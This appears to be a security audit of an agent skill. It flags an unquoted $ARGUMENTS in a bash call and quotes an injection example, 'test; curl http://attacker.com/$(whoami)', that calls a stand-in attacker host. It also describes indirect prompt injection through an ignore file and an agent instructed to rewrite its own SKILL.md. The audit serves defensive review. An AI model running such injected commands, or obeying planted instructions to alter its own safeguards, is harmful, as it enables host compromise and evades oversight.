The Agent Skills Directory

[COMMAND_EXECUTION]: The bash execution block in SKILL.md utilizes the $ARGUMENTS variable directly in a shell command: bash "$PLUGIN_DIR/scripts/manage-ignore.sh" $ARGUMENTS. Because the variable is not quoted or sanitized, it is susceptible to command injection if a user or an adversarial process provides input containing shell metacharacters (e.g., ;, &, |, or backticks).
[PROMPT_INJECTION]: The 'Self-Evolving Skill' section instructs the agent to autonomously modify the SKILL.md file if it encounters issues: 'fix this file immediately, don't defer.' This self-modification capability creates a significant risk where the agent could be manipulated via adversarial tool output or user prompts into rewriting its own instructions to include backdoors or remove safety filters.
[REMOTE_CODE_EXECUTION]: The combination of the Bash tool and the lack of argument sanitization allows for the execution of arbitrary code on the host system. An attacker could exploit this by providing a pattern that terminates the intended command and starts a new one, such as test; curl http://attacker.com/$(whoami).
[PROMPT_INJECTION]: The skill is vulnerable to indirect prompt injection due to the way it processes external data:
Ingestion points: The skill reads the contents of ~/.claude/lint-relative-paths-ignore to list patterns or verify changes.
Boundary markers: There are no markers or instructions to treat the file content as untrusted data, allowing embedded instructions in the ignore file to potentially influence agent behavior.
Capability inventory: The agent has the ability to execute shell commands via the Bash tool and can rewrite its own SKILL.md configuration.
Sanitization: There is no evidence of validation or sanitization of the content retrieved from the ignore file before it is presented to the agent's context.

ignore